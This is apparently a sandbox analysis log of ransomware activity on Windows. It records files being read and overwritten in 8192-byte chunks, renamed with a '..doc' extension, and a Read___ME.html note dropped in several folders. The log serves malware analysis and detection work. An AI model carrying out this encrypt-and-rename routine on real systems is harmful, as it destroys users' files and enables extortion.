File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, type = size, size_out = 105669	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 8192, size_out = 7365	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 7376	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\IconCache.db..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, type = size, size_out = 8192	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.chk..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDB.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, type = size, size_out = 2097152	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, size = 8192, size_out = 8192	1	Fn Data
